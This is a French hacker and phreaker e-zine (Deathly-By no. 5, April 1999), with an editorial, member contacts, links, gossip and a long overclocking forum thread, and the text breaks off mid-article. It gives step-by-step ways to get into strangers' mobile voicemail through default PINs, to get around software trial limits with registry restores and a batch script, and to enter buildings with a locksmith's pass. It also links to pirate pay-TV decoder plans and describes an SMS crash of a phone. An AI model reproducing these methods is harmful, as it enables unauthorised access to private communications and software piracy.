| Avril 1999 -- DeAtHlY-bY mAgAzInE 5 -- Final Version | | 77 | | 77 | | ÜÜÜÜ ÜÜÜÜÜÜ ÜÜÜ ÜÜÜÜÜÜÜÜ ÜÜ Üá ÜÜ ÜÜ ÜÜ | | ² ² ² ² ² ²² ²² ²² ²² ²² 77 ²² | | ² ² ² ² ² ²² ²² ²² ²² ²² ²² | | ² ² ²²²² Ͳ²²²²²²= ²² ²²²²²²²²² ²² 77 ²²²² | | ² ² ² ²² ²² ²² ²² ²² ²² 77 ²² | | ² ² ² ²² ²² ²² ²² ²² ²²77 ²² | | ²²²² ²²²²²² ²² ²² ²² ²² ²² 77²²²² ²² | | 77 | | 77 77 /\/\/\/\/\/\/\/\/\/\/\ | | 888 77 77 We Are Here For Your | | 88888 8 77 77 Unique | | 8 ²² 8 77 77 Pleasure ! | | 8 8 77 77 /\/\/\/\/\/\/\/\/\/\ | | 8 88888 77 | | 8 888 77 | | 8 ²² 8888 77 | | 8 888 77 | | 888 | | | | | ------------------------------------------------------------------------------------------------ EDITARD Donc nous voila reparti pour le 5 eme n° de Deathlyby encore plus fort que jamais :) Nous squattons en ce moment un VmB (voir article dans deathlyby4 de mufum) donc vous pouvez nous faire parvenir vos questions au téléphone (gratos car numéro vert), plus bas vous avez nos N° de boites aux lettres. Sinon la liste des Officierz devient très importante,ceci est la preuve du succès de deathlyby. Je voudrais remercier tous les gens qui nous envoient leurs articles et qui font vivre Deathlyby! Sinon sur l'article sur l'overburn je disais avoir oublié le terme technique, c'était burning in qui consiste à laisse son Pc à un voltage important et à le remettre à un voltage moindre pour le faire passer à une fréquence supérieur. Lisez ce zine avec la résolution 800*600 ou plus, mais pas moins :) Bon, on va rester un an sur cet EDITARD GO GO GO GO! Si vous utilisez Wordpad, mettez le en "retour à la ligne sur fenetre". PS.Fugitif : Ben, voila on est déja au 5, et trés vite le 6! :) Halala ca passe vite! ------------------------------------------------------------------------------------------------ !VIVE LA DEMOCRATIE, LIBERTES EGALITES FRATERNITES! FUCK OPPRESSION...go to hell! FUCK REPRESSION...go to hell! ------------------------------------------------------------------------------------------------ DiskLamez: Le texte qui constitue l'essence de ce zine est constitue d'informations a but EXPLICATIF UNIQUEMENT... IL EST STRICTEMENT INTERDIT PAR LA LOI DE LIRE LA SUITE!!! ENCORE MOINS DE FAIRE C'KY A ECRIT! JE NE SUIS PAS RESPONSABLE!!! SUICIDE MAY CAUSE DEATH !!!!!!!! ------------------------------------------------------------------------------------------------ OFFicierz: Cedru (messagerie : 5376) -->Cedru13@hotmail.com Fugitif (messagerie : 5386) -->Fugitif@hotmail.com FuNzZy -->FuNzZy@Hotmail.com Eldre8 -->eldre8@cyberdude.com Goliath59 -->Goliath59@hotmail.com Little Bob -->littlebob57@yahoo.fr M@X -->axel_spirit@yahoo.com Mitix -->titux@chez.com MufUm (messagerie : 5349) -->mufum@caramail.com Droopy (messagerie : 5375) -->Même email que Cedru (facture trop lourde doit se passer du net quelques temps encore) Je lui ferais suivre ces messages Deepspy -->deepspy@caramail.com Faust -->faust19@caramail.com Krtman -->krtman@caramail.com Doc -->amadho@excite.fr Page Web: http://members.xoom.com/deathlyby2/ Nous avons déménage, car on c'est fait efface sur deathlyby! :) Vous y trouverez des progs, des liens et bien sur les n° du zine... ------------------------------------------------------------------------------------------------ Rejoignez nous en IrcNet #infonie, #france, #warez-france etc... Ndcedru : Heu je sais pas si il y a encore beaucoup de membres qui passent sur Irc, car on s'amuse sur le Vmb 0800 397 397! :) On recherche des pros du hack en france, et des pros du phreak de cellulaires REJOIGNEZ NOUS! Si vous voulez écrire un article pour DEATHLY BY, n'hésitez pas ! envoyez le à mon Email, je me ferais un plaisir de vous intégrer à l'équipe ! ------------------------------------------------------------------------------------------------ ************************************************************************************************ Sommmaire ************************************************************************************************ -- Service courrier By Cedru -- Exemple de dialogues sur le Vmb 0800397397 By Cedru -- Les meilleurs sites Web By Cedru -- Les râgots du net By Cedru -- Plus d'articles internet pendant quelques temps... By Fugitif -- Les mobicartes... By Fugitif -- Un peu de Cracking By Fugitif -- Les virii (ou virus au singulier !) by FuNzZy -- Les Virii! By Eldre8 -- Explosifs et fumigènes ! By Titux -- Introduction au cryptage By Faust -- Commet hacker la FNAC By Faust -- Pourquoi je hacke??? By Faust -- Cryptage, suite By Deepspy -- SE via HTML By Deepspy -- Bienvenue Chez le Dr M@x. -- Comment créer un compte gratuitement chez un Provider BY Krtman -- RED BOX By Doc -- Scan de la VMB "VOCALE" du parlement européen By Doc and Madmax -- Comment utiliser correctement le 0800 397 397 partie 2 By Mufum -- Une après-midi avec les rédacteurs de Deathly-by By Droppy -- NOUVELLE SERIE CULTE SOUTHPARK ( 1/2 ) By Droopy -- Initiation au cracking By Little Bob -- Recrute pour un groupe de hacker -- Dans le prochain n° et le mot de la fin ================================================================================================ Service courrier ================================================================================================ Bon j'ai une solution pour toi la première toute con, c'est de se procurer un pass de facteur. En effet quand les boites aux lettres sont de l'autre coté de la porte, le facteur ne pouvant pas mémoriser tous les digicodes du quartier, et vu qu'il ne possède pas toutes les clefs d'immeuble de sa tournée. Il a une sorte de pass qui marche tout le temps. Bien sur il faut que les boites aux lettres soient dans l'immeuble. Tout bon serrurier le possède (il n'en à pas le droit mais bon) en insistant tu peux en avoir un entre 150 et 250 balles. Sans rire y a une deuxième solution quand je trouve pas ma clef je donne un bon coup de pied ca fait sauter n'importe quelle gache électrique en fait ca depend du poids de la porte. Sinon à mon avis en demontant le bordel (ce qui n'est pas discret) tu peux faire faire grisit au digicode et la sesame ça s'ouvre mais là j'ai jamais essayé. Ndcedru : Merci on le savait dejà ce que tu écris, mais c'est toujours intéréssant pour les autres gens.Si je vois des boites aux lettres fracassées je saurais que c'est toi ! ;) ================================================================================================ Exemple de dialogues sur le Vmb 0800397397 By Cedru ================================================================================================ MEssage d'accueil de DRooPY : Bienvenue vous êtes bien sur le messagerie de DRooPY (avec une voix de taulard bien grâve) Donc moi cedru je lui envoie un message pour me moquer de lui ! :) J'aurais jamais du jouer au con avec DRooPY, c'est bien connu il y a pas plus con qu'un DRooPY!! Heu si 2 DRooPY!!! (c'était la blague de Cedru) (NdDRooPY: Chers lecteurs c’est à cet instant précis que vous êtes sensés rire...) Donc DRooPY commence à m'envoyer 3,4 messages par jour (les horaires 7h35 du mat dans une cabine téléphonique juste avant d'aller en cours) bon les messages bien con genre : salut c'est encore DRooPY juste pour te dire que moi ça va! ;) Bon il me spam ma boîte avec 5 à 6 messages! :) NdDRooPY: Même pas vrai d’abord !!! Second message de DRooPY : Vous êtes chez DRooPY repris de justice et futur taulard. Donc moi mort de rire je lui envoie des messages, mais il ne faut pas envoyer des messages à DRooPY parce qu'il répond et en plus il envoie 5 à 6 messages en plus! (donc vous entendez 10 fois le message : vous avez reçu un message de DRooPY repris de justice et futur taulard...) Je vous dis pas à la fin ca devient lourd!!! Nd DRooPY: Ben tiens parce que c’est mieux chez toi peut-être ?! Le plus marrant c'est d'entendre des gens vous parler et vous avez pas la possibilité de leurs répondre, donc des fois vous restez trop con devant votre téléphone! Puis lorsque c'est votre tour d'envoyer un message c'est genre : Heu salut..... heuuuuu je voulais te dire..... heuuuuuuuuuuuu donc ca va? :) Mais on s'habitue avec le temps.... Sinon il y a de tout sur le Vmb,le mongolien,le bourgeois,le con,le sympa,le timide,le pervers avec DRooPY dans le rôle! (NdDRooPY:Cedru je sais pas ce que tu as contre moi, c’est peut-être mon succès avec les filles qui te rend jaloux ??? C’est pas ma faute si je suis un tombeur...) Mais c'est très convivial et vous recevrez dans les 10 messages par jour! ;), si vous êtes un peu sociable.Donc voila bonne chance, et je veux pas de spam de messages sur ma boite aux lettres ok? ================================================================================================ Les meilleurs site Web By Cedru ================================================================================================ Le site de cryptel, ils ont changé d'adresse. http://www.citeweb.net/cryptel/ Le top 25 francophone (notre site concours aussi) Votez pour nous!!! http://www.ouf.org/top-fr/topsites.html Un super site de cul gratuit!! http://www.multimania.com/isatis2/ Un site ou trouver les derniers jeux pour l'émulateur N64, mais sur le site de deathlyby il y en a plus!!!!! http://www.multimania.com/toudy/nintendo64.htm http://members.xoom.com/deathlyby2/ http://www.chez.com/mathieubarthelemynintendo/nintendo64.html Site avec plein de ezines et de très bonnes critiques comme (lol!!) : Ajout aussi de Deathly By #4 qui donne de bonnes infos tout en gardant un esprit très cooool ;) http://www.multimania.com/gripsou/ Un site avec plein de ezines que je citais dans le numero4 à changé d'adresse : http://mbr-ecology.neotown.com/madchat/MAGS_index.html Maintenant c'est : http://madchat.org celui la aussi : http://www.multimania.com/mygmat/index1.html maintenant : http://cybz.virtualave.net/ http://www.geocities.com/Vienna/3558/PLANS.htm Les plans du décodeur canal+ ça peut toujours être utilise et le principe nagravision....! ;) Les auteurs du site disent : Vous y trouverez tous les plans necessaire a la fabrication d'un decodeur pirate pour decoder les chaines francaises sur Telecom 2a & 2b et c+ en version hertzienne. ================================================================================================ Les râgots du net By Cedru ================================================================================================ News que j'ai pris sur le site de cryptel : Crasher un nokia 5100 via SMS. Oui, oui vous avez bien lu c'est la derniere découverte publiée sur le site web du CCC. Comment faire il suffit d'envoyer un mini message au posseseur d'un nokia 5100 avec comme contenu de message 160 points "." Cela crée un denial of service qui met OUT le telephone portable du proprietaire. Kewl non ? Forum parlant de l'overclocking d'une carte son, très intéréssante conversation!!! Voilà, certains d'entre sauraient ils comment peut on overclocker une carte son? MERCI D'AVANCE! Alors??? y'en pas un qui touche ici? Salut ! Tres honnêtement, qu'esperes tu tirer d'une carte son overclockée ? Du son + fort ? ) hehe... autrement, ben tu peux overclocker en overclockant le bus ... Ca overclockera automatiquement la carte son ) C'est pas parce que le webmaster a un verre dans le nez qu'y faut croire tout ce qu'il raconte. Tiens, j'm'en va OC mon grille pain, ça ira plus vite au p'tit déj' Franchement, vous êtes navrants... je ne m'adresse pas au novice! Sachez que l'un facteur qui ralentit les applications ludiques (3d surtout), c'est le son! Pour s'en rendre compte, il suffit d'observer final reality en avec et sans son! A votre avis pourquoi les constructeurs ont-ils sorti des cartes sont pci? Simplement parce que l'utilisation des ressources procs est bien plus faible avec une carte pci que isa!!! MAIS c'est pas encore le pérou! Aussi n'assayer plus de vous la péter alors que vous venez à peine de sortir des couilles de vos pères... J'avais entendu parler d'une manip consistant à augmenter la mémoire des cartes SB64 en utilisant les vieilles barrettes de RAM des 486. C'est vrai que ça n'est pas de l'overclock à proprement dit mais c'estun moyen d'augmenter la "puissance" de carte son. C'etait pour les AWE32... Y a des lustres que les constructeurs n'utilisent plus des Ram standards (faut bien gratter du pognon...) Overclocker ta carte ne servira a rien car tu es toujours limité par l'ISA ou le PCI Deja en prenant une carte PCI tu enleve un gros goulet... Reste plus qu'a faire un ASP.. Fodger doit avoir un cerveau OC, mais y devrait mettre un ventilo, l'est pas trop stable Super, j'ai OC ma carte son ! Et après ? J'ai de la meilleure musique ? Si les proc' des cartes son avaient des tâches très complexes à réaliser, et que le proc' pédalait, on aurait des petits problèmes de qualité pour avoir de la bonne musique. Ca se produirait surtout si le proc' de la carte son obligeait ta CPU à attendre un retour d'info ou si ton CPU devait s'occuper d'une partie du traitement sonore, ce qui est bien le cas. Seulement, à ma connaissance, les proc' des cartes son arrivent parfaitement à manager tous les traitements qui leurs sont dédiés. Ils se contentent d'attendre que la CPU ait terminé sa part de traitements, et c'est là que vient le vrai problème : ça passe par un bus, et le bus, a la fois, il introduit un état d'attente, mais aussi, il bouffe des resources CPU (un bus ISA ou PCI, faut le gérer, et c'est pas vraiment ta carte son qui s'y colle, vois-tu ?). Si t'augmente la puissance du proc' de ta carte son par un OC, la CPU a toujours autant de boulot, parce que le goulot d'étranglement, c'est le bus !! pas la capacité de ta carte son à fournir le résultat du traitement plus rapidement... Les chips des cartes son sont suffisament puissants, et seul l'introduction de nouvelles instructions peut faciliter le travail du CPU, si ces instructions économisent la puissance CPU, comme dans le cas de l'optimisation KNI du PIII (là, y'a besoin de moins de transferts sur le bus). Faut aussi que ce jeux d'instructions touche le traitement sonore, bien entendu. Ca devrait être le cas pour le traitement du AC3, qui apparait avec les DvD, pour lequel y'a un gros boulot de décompression. Pour le traitement sonore ordinaire, pas besoin de beaucoup plus. Y'a pas d'amélioration du son comme avec la vidéo, parce que y'a pas de "frame rate" à mesurer sur tes hauts parleurs, on va pas rajouter des notes de musique. C'est un signal à 44.1 Khz en 16 bits, point barre. Alors comme ça on persiste? Ecoutes bien : le problème est le même que les cartes graphiques (puisque c'est à la mode en ce moment), sur ta carte son (tu sais le petit morceau de plastique avec des composants) il y a un processeur spécialisé dans le traitement de signal, il est cadencé comme n'importe quel autre UC à une certaine fréquence, il traite le son avec une certaine vitesse, il envoie les données sur le bus avec une certaine vitesse (il y a trames a envoyer dans un certains ordre etc..), il solicite plus moins ton processeur, ok? Compris? Chuis pas sûr... XXXX, qui en marre des gars qui ressortent des infos sans rien comprendre de ce qu'il y dérrière. (En plus je suis électronicien/informaticien!) Salut à tous, tout d'abors calme, je n'ai pas la réponse quant à l'overclock de la carte son et n'ai pas la prétention d'être un crack en info. Par contre, je peux amener ma petite expérience : je possède le volant à retour de force sidewinder de microsoft branché bien évidemment sur la carte son (SB 16 sur ISA). Tout le monde sait que les infos pour le volant sont hyper compressées et volumineuses.je ne sais pas si overclocher la carte changerais quelque chose mais je peux vous dire que lorsque celui-ci fonctionne, il fait saccader Need for Speed 3. Ce n'est peût-être pas si idiot que ça de vouloir booster la carte (je sais bien que dans mon cas, la passer sur PCi sera déjà très bénéfique mais mon portefeuille...) Bien à vous. petit calcul: 44.1Hz, 16 bits Ca fait a peu pres 88200 octets par seconde. En tout cas, on est largement en dessous des 100ko/s. Alors ne dites pas que c'est l'isa qui constitue un goulot d'etranglement. Meme avec plusieurs voies, on est tjs bien en dessous du 1.5Mo/s (reel) supporte par l'ISA. de +, les DSP et cna des cartes sons ne rament pas. ON ne peut pas non plus dire que le bus ISA est plus long a gerer que le bus PCI puisqu'il est ponté sur le PCI.(il n'est pas gere directement) Je pense qu'on est passé au PCI pour le son a cause des recommendation wintel mais que ca sert a rien (sauf a eviter les conflits lors de l'install.) D'ailleurs, les fabricants de carte son ont vraiment mis longtemps a se mettre a l'ISA. Ce forum est plutôt cool ! Y'en a toujours un qui va la ramener sur sa formation ou sur son job, comme si ça voulait dire que sa réponse est définitivement exacte. Un électronicien/informaticien ... j'chui vaaaachement impressionné. Tu vois, sur ce forum, y'a aussi bien mon petit cousin qui se ballade, que des gents qui sont carrément compétents. Mais y prennent pas les autres pour des billes et évitent de se la ramener. Moi, mon truc, c'est plutôt de donner un coup de main aux autres quand j'ai une bonne réponse, pas de poser des challenges à la con pour montrer que j'ai la plus grosse b... Mais quand j'ai un rigolo qui se prend pour un cador, j'ai un malin plaisir à le renvoyer dans ses buts. Monsieur l'informaticien, dans ta réponse, pense-tu m'avoir sorti l'argument qui tue ? J'ai pas vu la moindre compétence technique, la plus petite parcelle d'analyse du problème, rien ... Quand j'ai tort, je m'écrase. Toi, c'est pas vraiment ton cas. C'est bien, ça prouve que tu as de la suite dans les idées. Alors, je vais essayer de prendre un exemple plus simple : Le lecteur de CD audio, qui a du sortir sur le marché au même moment que les premiers PC, ou même avant (époque du 8086), il lit bien des données sur un disque, non ? Après les avoir lues, il transforme ces données numériques en signaux analogiques, ce qui est fait par un DAC (digital analog convertor), il utilise le signal qui sort du DAC pour le traiter à l'aide d'un pré-ampli, qui transmet des signaux analogiques à l'ampli à l'aide de cables RCA, XLR, mini-DIN, ou ce que tu veux... Et bien, ce lecteur de CD, IL FAIT LA MEME CHOSE QUE TA CARTE SON ! Sauf que les infos numériques arrivent du disque dur et pas d'un CD. Et, vois-tu, ça marche très bien comme ça depuis lontemps, alors que les PC avaient encore des cartes en mode Hercule à l'époque. Tout ça pour te dire que le fameux signal à 41.1 Khz en 16 bits, CA FAIT UN BAIL QU'ON SAIT LE TRAITER AVEC UN CHIP DE MERDE, PAS BESOIN D'OC. Au passage, tous les constructeurs du domaine audio on abandonné depuis longtemps la course à la puissances sur les DAC, même SONY et ses super processeurs "Pulse 1 bit" n'a rien amené de nouveau. Pour un signal à 44 Khz, en 20 bits, qui semble être la nouvelle norme audio qui se déssine, y'aura pas plus de problèmes. Et sur ton PC, la seule différence, c'est que ta carte son doit dialoguer avec la CPU. Donc, c'est pas la vitesse de traitement du signal qu'il faut augmenter, C'EST LA VITESSES DE TRANSFERT DES DONNEES ENTRE TA CARTE SON ET LE CPU, non de Dieux !!!! Et si tu comprends pas que ta carte son elle sert à rien pour ça, si tu te contentes de l'OC, je désespère. Ta carte, elle ATTEND que la CPU et le bus aient fait leur boulot, pour enfin continuer le sien. Tu pourrais presque l'under clocker, ça marcherait tout de même. Enfin, je souhaite pour toi que ton patron ne s'aperçoive jamais que ton diplôme, c'est du vent. Tu devais, comme moi, aller jouer au baby foot au café, au lieu d'aller en cours. Bon, et pour ce qui touche au bus, je vais pas faire un cours entre le bus ISA et le BUS PCI, contentez vous de savoir qu'une des différence entre les deux, c'est que ça va plus vite sur le PCI et que ça prend moins de resources processeur. Quand à la bande passante du bus, faut pas oublier que y'a pas que la carte audio qui utilise les bus dans un PC. Donc les calculs à la noix qui prouvent que les données devraient passer sans problème sont donc faux, de toute manière. Et surtout, y a pas que la bande passante qui joue (un exemple ? nos diques UDMA devraient transferer les datas à 33 Mo/s, suivant les caractéristiques du bus. On en est loin...), y'a la vitesse à laquelle la donnée devient disponnible. Et puis zut, si vous croyez qu'une carte son ISA va aussi bien qu'une PCI, faites comme vous voulez, ne croyez pas les benchs, ne croyez personne, restez chez vous avec votre beau diplôme d'électronicien/informaticien acroché sur le mur. Personne ne vous le reprochera. Bon, je retourne bosser, j'ai quelques dossiers à régler, des trucs de merde : du SAP R/3 avec un module Business ingeneer ésotérique, du NRP à organiser dans un p'auv réseau N tiers de quelques miliers de postes, de l'intégration de SGDT autour d'un foutu Product Manager qu'arrive pas à la cheville de Metaphase, ... Je laisse les vrais pro donner des conseils avisés, l'informatique, c'est vraiment trop compliqué pour moi Bon, j'y connais toujours rien mais là je crois que XXXX il a fait fort ! ça impressionne et ça fait envie (d'en savoir autant). Même si c'est des conneries je ne serais pas capable d'en inventer autant. Bon, j'arrête la lèche... Dis, Toinou, tu pourrais pas répondre à mes questions posées dans "blabla divers" sur les CD dupliqués ? Hé XXXX, Viens faire un tour chez nous au Canada, notre gouvernement envisage de légaliser la marijuana -))))). STOP, z'avez rien compris au bleme je m en va vous esplicationner!! j ai reussi à O/C ma carte soundblaster 16 en soundblaster 18!!!! facile, voila la procédure: il suffit de rajouter dans l autoexec bat les lignes suivantes no smoke = yes atapi device SB 18 no bug = yes on reboot et le tour est joué!! Suceptible toinou hein? BON Pour rectifier : c'est vrai sur ce coup j'ais pas du tout assurer avec ma connerie (je reconnais!) d'informaticien/électronicien (très très con effectivement), sur ce keep cool! C'était juste pour évoquer un sujet dont il est (à mon humble avis, ok toinou) intérresant de parler! Et toinou tout ce que a dit est vrai, je suis OK avec toi. N'empêche que si les cartes se "contentaient" de faire SIMPLEMENT le travail d'un lecteur CD, ON AURAIT PAS VU UNE SI GRANDE FLOPPEE DE NOUVEAUX MODELS ARRIVE avec toujours plus d'effets sonores gérés (notament le son 3D, vive l'air de la 3D!) ou encore le passage du bus isa au pci, la compression/decompression des sons etc., exigent fatalement des ressources mêmes si les convertisseurs analogiques/numériques et les DSP sont, il est vrai, très rapides! Il est sûr que chercher à OC une carte n'est pas une idée très lumineuse mais c'est toujours interressant (j'aime apprendre...) de savoir si c'est faisable et si oui comment! On peut parfois avoir de bonnes suprises en excutant certains pratiques non? Pour info : lorsque l'awe64 sortait on conseillait un puntium/k5 90Mhz mininum pour l'exploiter correctement!" (pourtant une simple carte son!), les cyrix posaient alors de gros problèmes du à la légendaire lenteur de l'unité arithmétique et logique en calculs à virgule flotante!!! Et les dernières comme la SBlive & Co crois tu que tous aient son petit puntium II? Je ne suis pas sûr (je pose la question!) que telles cartes fonctionnent à merveille avec le max de leur possibilités dans des puntium 120Mhz par exemple, car l'utilisation de tables d'ondes pour le son midi et maintenant la technique du guide d'onde(?) ne revient SIMPLEMENT A LIRE UN FICHIER SON OU UNE PISTE AUDIO AVEC UNE REPRODUCTION FM A LA CON! Autre chose comment expliques tu (ça dépend evidement des configs) qu'en lançant des benchs comme final reality avec et sans son, on puisse constater parfois une différence significative, fais le test? Et as ton avis pourquoi l'essentiel des benchs (comme 3DWinBench99 ou 3DMarks99!) n'utilisent pas de son? c'est pas simplement parce qu'ils n'ont pas voulu en mettre! De plus pourquoi dans la plupart des jeux on te propose choisir et modifier la qualité sonore? Sûr que si tu as un PII450, et une carte son pci il y aura sans doute de quoi crever de rire pour les différences! Mais laisse moi te dire (et on est encore super nombreux!) a posseder des cartes isa et que j'ai constater de net différences! Il est evident que tous les facteurs que tu as cités (comme le temps de réponse de la bécane, l'accès aux données...) y sont bien entendu pour quelque chose! Mais c'est le même prob que pour une carte graphique (elle soumise elle aussi aux timings des composants)! Sur ce c'était à l'origine une simple question suffisament interresante car tout à fait (à mon sens, mais je crois que je dois le seul apparement) réaliste! En tout cas toinou, tu peux rester zen, mon but n'est pas de foutre le bordel mais d'apprendre, que je voulais pas me la faire style genre "j'ai des grosses couilles de super hyper fort informaticien/électronicien", que ce sujet n'est cependant une connerie abérhante du genre ce certains neuneus disent en parlant de "rôdage du processeur"!!! Amicalement XXXX, qui sait ouvrir sa geule (là je peux rien faire contre! ) =============================================================================================== Plus d'articles internet pendant quelques temps... By Fugitif =============================================================================================== Salut tout le monde, depuis quelques temps, j'ai plus internet donc j'essaye de faire quand même quelques articles ayant rapport au net. J'espere tout de même que le net reviendra bientot chez moi. Enfin, quelque soir je me connecte dans le dos de mes parents avec un chtit aboz, mais c'est assez rare et assez tard. :) Vous pouvez quand même m'envoyer du courrier (fugitif@hotmail.com) c'est Cedru qui receptionnera et voir qui répondra si il y a vraiment besoin d'une réponse. Au sujet des sources du client / serveur elle sont dispos sur ce n° 6 dans le zip trojan.zip. (Voir articles "Programmation de trojan"). Et puis désolé si on peut répondre à tous les mails because on n'en recoit deja pas mal ! :) C'est dure dorénavant de trouver des idées d'articles, enfin j'en ai fait quand meme quelques uns... Mais étant donné que le n°5 est assez chargé d'articles, j'ai pus en mettre que 3. Les autres paraitront dans le n° 6, qui sera trés vite publié. Remarque : je vaus rappelle de lire les articles en 800*600 ou + , et avec l'option retour à la ligne sur fenetre. Je recherche plusieurs infos, ce serait sympa si quelqu'un puisse m'envoyer ces infos par mail: - Les schémas (ou des infos) d'un lecteur/editeur de carte à puce T2G via PC sur port parallele. En francais si possible. - Des codes confidentielles d'Uni Call usagers (pour un projet, voir article) Je remercie le lecteur qui a donner le truc des mobiscarte et tous ceux qui nous envoie du courrier. Vous pouvez aussi me contacter plus directement par boite vocal(VMB), mais aprés 19H : Sur le credit agricole : N° : 0800331010 Ma boite : 4231 ----------------------------- Sur le 0800299300 : Ma boite : 11 ----------------------------- Ou biensur sur Iltie France (0800397937 (ma boite : 5386)) Avant j'avais la 5380, je pense qu'elle a grillé, ra c'est l'employés! ----------------------------- Je pourrai vous répondre si vous avez une boite sur un de ces n° ou sur un autre n° vert (ou dans le magazine si c'est interressant. Ne me donnait pas de n° de tel à rappeller je le ferai pas. @+ =============================================================================================== Les mobicartes... By Fugitif =============================================================================================== J'ai lus la lettre de W@rzy dans le n° 4 que je remercie d'ailleur, ou il donnait une astuce pour les mobicartes c'était sympa, mais j'ai découvert une chose! :) D'abord, l'astuce consitant à utiliser la boite vocale d'un possesseur d'un tel à mobicarte comme bon vous semblez (ecouter/effacer/archiver des messages, modifier le message d'acceil etc etc). ------------------------------------------------------------------------ Ca consister à appeler le : 0607078519 puis au lieu de faire * tapez un n° de cellulaire, W@rzy donnez le: 0685199@@@# puis mettre le pass de défaut 0000# et il a marqué : mettre n'importe quoi à la place des @. ------------------------------------------------------------------------ Donc si on met des chiffres au hasard à la place des @ on tombera sur des boites vocales au hasard et si on met un n° précis de quelqu'un qui commence pas par 068519 ca foire donc c'est pas marrant de tomber sur la messagerie d'un mec qu'on connait pas. De plus, quand on arrive sur le 1 er n° ca vous dit bienvenue sur le répondeur Itineris ou un truc comme ca, alors avec mon cerveau j'ai dit le préfixe 85 doit etre spécifique aux tels cellulaires Itineris,et le 19 doit etre spécifique aux tels cellulaires Itineris qui commence par 068519, donc ce répondeur est réservé au 068519 et il doit en exister d'autres, disons un répondeur pour chaque service (85,Itineris) et pour chaque branche (j'appelle une branche, les deux chiffres comme le 19, qui sont apres le n° de service) par ex : 0607078518 => Répondeur pour les n° commencant par 068518 0607078519 => Répondeur dont on parle (068519) 0607078520 => Répondeur pour les n° commencant par 068520 Remarque : Biensur, la j'ai mis des branche au hasard, il se peut qu'elles existent pas ou qu'elles existent .Mais c'est pas le principale, c 'est pour vous faire comprendre... Vous avez compris la combine? Imaginons, vous avez un pote qui a un Itineris sur Mobicarte, son n° c'est 0685211515. Et vous voulez allez sur sa boite vocal faire des conneries en esperant qu'il ai laissé le mot de passe défaut. Si vous faites le 0607078519 ca va foiré donc il faudra faire le 0607078521, car le n° commence par 068521. Donc au lieu, de mettre 8519 à la fin du premier n°, mettez les 4 chiffres aprés 06 du n° de tel que vous voulez "hacker". Si vous lisez bien mot à mot, vous devriez comprendre, je donne des exemples: N° de portable : 0685221616 / Répondeur : 0607078522 N° de portable : 0685241616 / Répondeur : 0607078524 N° de portable : 0685381616 / Répondeur : 0607078528 En ce qui concerne les marques, voici les n° de répondeurs, que j'ai trouvé : 06070785@@ = Repondeur Itineris 06070784@@ = Repondeur Ola 06070783@@ = Repondeur Ola 06070782@@ = Repondeur Ola 06070781@@ = Repondeur Ola Remplacez les @@ par la branche du n° :) Ensuite n'appyuez pas sur * puis faites le n° de tel + # et le code + # Remarque : sur les Ola, il n'y a pas de pass de défaut, et si l'utilisateur n'a jamais utilisé ca messagerie via un poste de tel, il n'y aura pas de mot de passe enregistré donc aucune possibilité de hack, et si il y a un pass enregistré ce sera surement pas 0000 :)) Donc vaut mieux laisser tomber... Les mots de passes de Ola s'enregistre du cellulaire, donc si c'est un Ola laisser tomber. Pour l'instant j'ai trouvé que ces répondeurs, j'ai essayé des truc du style: 0607071120 0607073520 Mais ca marche pas donc, soit les n° du style 0611 n'ont pas de service messagerie à distance, soit il ont un n° de répondeur qui commence pas par 060707. J'espere que j'aurais été clair sur cet article :) =============================================================================================== Un peu de Cracking By Fugitif =============================================================================================== Bon, je vais pas vous parler de cracking barbare en asm, mais je vais vous parler du cracking à ma façon, mais du cracking à ma facon si on peut appeler ca du cracking. Donc, vous venez de téléchargez un prog qui vous tiens à coeur, mais malheuresement il est limité en jours ! Ou au nombre de lancement . Ne le lancez pas. Lisez d'abord le readme.txt , si il parle de serial essayez deja de trouver un serialz sinon continuez. Si il parle pas de serial , mais de time trial , limitation execution, continuez à lire. Avant de lancé le programme, faites une copie de votre base de registres comme ceci : - Lancez regedit.exe - Allez dans le menu registres et faites exporter un fichier du registre. - En bas cocher tout. (On va se cassez les couilles à chercher la branche qui nous interresse! ) - Enregistrez la, disons dans le bureau au nom de crack.reg par exemple! :) Lancez votre prog, fermez le , bon attendez une journée relancez-le, si il vous dit vous en etes au 2 eme jour à la 2 eme execution c'est normal, donc fermez le , lancez crack.reg dans le bureau il dit normalmenent un truc du genre : "Les données ont été inscrties dans le registres". Apres, lancez le prog, si il dit vous etes à votre 1 ere journée ou vous en etes à votre 1 ere execution , c'est bingo , ca veut dire que le maintenant vous savez que la protection est dans la bases des registres. Il suffit de supprimer les clés du programmes dans la base des registres. Pour cela, dans regedit faites edition/rechercher cocher clés puis rechercher le nom du prog et supprimer les clés! Il suffit ensuite de refaire cette manoeuvre (deleter les clés ) à chaque fois que vous etes à la derniere execution ou au dernier jour! :) Si cette méthode ne marche pas , cela veut dire que la protection ne se situe pas au niveau de la bases des registres, elle peut donc se situer dans un fichier .ini, mais ca c'est rare quand meme, c'est du style : shareware = 1 ou demo = 1 il suffit de remplacer le 1 par un 0 (des fois 2) puis c'est bon vice versa, ou alors du style : days = 3 (ca fait trois jours donc remplacer le 3 par 1) ou execution = 5 (ca fait 5 exectuion remplacez le 5 par 1) Enfin si c'est un fichier .ini c'est generalement une protection batarde! :) Sinon elle peut se cacher dans des faux fichiers du style : config.dat config.thd ou style system.dat des merde comme ca! Puis ouvrez-les si ils sont en clair tant mieux, sinon ben c'est crypté donc pas possible! Il y a aussi des progs de merde ou tu change la date du pc, (dans le bios) par exemple tu as installer ton prog lundi 13 mars , ben tu remet la date au 13 mars, le prog va te dire vous etes à votre 1 er jour! Quelle protection de merdeeeeee! Et meme des fois, il suffit de supprimer un fichier qui fait 0 octets dans le dossier du prog, en fait chier est une connerie si le programme voit qu'il existe et ben, le prog est en mode demo ou à la date d'expiration. Si ca marche toujours pas , il y a une autre méthode qui marche bien! Comme vous savez que la protection n'est ni dans la base des registres ni dans une fichier de config en clair, vous faites ceci. Votre prog est installer dans le dossier : c:\prog\ créez un dossier temp dans c:\prog\ ce sera donc: c:\prog\temp creez un autre dossier crack dans c:\prog\ ce sera donc c:\prog\crack Si il y a des fichiers cachés, decachez les tous. Copiez tout les fichiers du prog dans le dossier temp. Donc imaginons que le prog ai 5 fichier : prog.exe help.hlp config.thd setup.ini setup.dat ca c'est un exemple Dans le dossier crack creez un fichier crack.bat, editez le et mettez dedans @echo off echo. echo Cracking en cours ! :) echo. cls cd\ c: cd prog cd temp copy *.* c:\prog cd.. prog.exe (imaginons que le prog s'appelle prog.exe biensur! :) exit Imaginons que vous etiez à 3 lancement, et ben relancez-le plusieur si ca reste toujours à 3 lancements c'est bingo ! :) Je m'explique donc, vous avez vos fichiers dans temp, vous savez que le nombre de jours ou de lancement est inscris dans 